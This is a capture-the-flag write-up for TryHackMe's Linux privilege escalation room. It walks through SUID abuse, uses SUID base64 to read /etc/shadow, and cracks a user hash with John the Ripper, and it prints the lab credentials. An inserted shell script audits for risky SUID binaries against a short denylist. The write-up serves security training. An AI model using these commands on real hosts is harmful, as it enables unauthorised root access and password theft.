TryHackMe: Write-Up Linux PrivEsc

One9twO
3 min read, Mar 23, 2022


Here’s a write-up for Tasks 10 and 12 in the room https://tryhackme.com/room/linprivesc

The other tasks in the same room have detailed instructions that are relatively easy to follow. Task 10 was slightly more confusing, and Task 12 is a challenge question with no instructions at all, so I’ll only write up these two.

Task 10: Privilege Escalation: PATH

Q. What is the odd folder you have write access for?

Find the writable files and directories and redirect the result to a file (which is easier to inspect later):

> find / -writable 2>/dev/null > /tmp/result

Skimming through the result, one directory stood out (/home/murdoch, the home directory of a rich guy).

Note that this directory will be useful for later questions too.

The task instructions require creating a C file (path_exp.c). However, gcc is not installed on the machine, so compiling it is not straightforward. Moreover, at this stage root privileges have not been obtained yet, so even with a compiled executable you would not be able to chown it to root and set the SUID bit that this exploit needs.

This is where Murdoch’s home directory helps. In /home/murdoch there is a binary named ‘test’, owned by root with the SUID bit set (it is the compiled executable of path_exp.c).

$ ls -al /home/murdoch
total 32
drwxrwxrwx 2 root root  4096 Oct 22 07:19 .
drwxr-xr-x 5 root root  4096 Jun 20  2021 ..
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
-rw-rw-r-- 1 root root    86 Jun 20  2021 thm.py

Run ./test:

$ ./test
root@ip-10-10-xx-xx:/home/murdoch#

and now you are root.

Q. What is the content of the flag6.txt file?

root@ip-10-10-xx-xx:/root# find / -name "flag6.txt" 2>/dev/null
/home/matt/flag6.txt

Task 12: Capstone Challenge

By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy. You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science. You can access the target machine over your browser or use the SSH credentials below.
Username: leonard
Password: Penny123

Of course, Leonard would have used Penny’s name for his password.

As usual, find the SUID executables:

> find / -type f -perm -04000 -ls 2>/dev/null

Compare the list with https://gtfobins.github.io/: both base64 and at look exploitable.
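The two findings above (a root-owned SUID binary sitting in a world-writable /home/murdoch in Task 10, and SUID copies of GTFOBins-listed tools such as base64 here) are exactly what a host audit should flag. The following POSIX sh helpers are an added example for that audit, not code from the room or the write-up; the denylist holds only the two names the write-up identified and is meant to be extended from gtfobins.github.io.

```shell
#!/bin/sh
# Added defensive audit helpers (not part of the TryHackMe room).
# Constructed denylist: the two SUID binaries this write-up flagged.
GTFO_SUID_NAMES="base64 at"

# Print SUID files under $1 whose basename is in GTFO_SUID_NAMES
# (e.g. a SUID base64 lets any user read /etc/shadow).
suid_gtfobins() {
    base_dir="$1"
    find "$base_dir" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
        name=$(basename "$f")
        for n in $GTFO_SUID_NAMES; do
            if [ "$name" = "$n" ]; then
                echo "$f"
            fi
        done
    done
    return 0
}

# Print SUID files under $1 whose parent directory is world-writable:
# the /home/murdoch pattern (drwxrwxrwx holding a root-owned -rwsr-xr-x),
# where any user can drop or swap files next to a privileged binary.
suid_in_world_writable_dir() {
    base_dir="$1"
    find "$base_dir" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
        d=$(dirname "$f")
        # -prune keeps find on the directory itself; -perm -0002 = others may write
        if [ -n "$(find "$d" -prune -type d -perm -0002 2>/dev/null)" ]; then
            echo "$f"
        fi
    done
    return 0
}

# Remediation: drop the SUID bit from a binary that never needed it.
strip_suid() {
    chmod u-s "$1"
}

# Stand-alone usage: audit the whole system (run as root for full coverage).
if [ "${AUDIT_ROOT:-}" != "" ]; then
    suid_gtfobins "$AUDIT_ROOT"
    suid_in_world_writable_dir "$AUDIT_ROOT"
fi
```

Run with AUDIT_ROOT=/ to scan a real host; each reported path is either a candidate for strip_suid or a directory whose permissions need tightening.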

What is the content of the flag2.txt file?

Check leonard’s bash history and you should see something like:

15  cd rootflag/
16  ls
17  cat flag2.txt

Looks like I found flag2.txt before flag1.txt. Run the following (without the leading >, which is just the prompt):

> LF='/home/rootflag/flag2.txt'
> base64 $LF | base64 --decode

What is the content of the flag1.txt file?

Using the same trick, we can read the shadow file:

> LF='/etc/shadow'
> base64 $LF | base64 --decode

You will see root’s and missy’s shadow hashes. Since I already have the root flag, I only need to crack missy’s.

missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

Save the hash, i.e. the field between ‘missy:’ and the next ‘:’, to a file. Single-quote it, otherwise the shell expands $6, $BjOlWE21 and the rest as variables and writes a mangled hash:

> echo '$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/' > missy-hash-file

Then use John the Ripper to try the popular passwords in rockyou:

> john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt missy-hash-file

After obtaining missy’s password, you can become missy with:

> su - missy

Then find flag1.txt:

> find / -name "flag1.txt" 2>/dev/null
/home/missy/Documents/flag1.txt
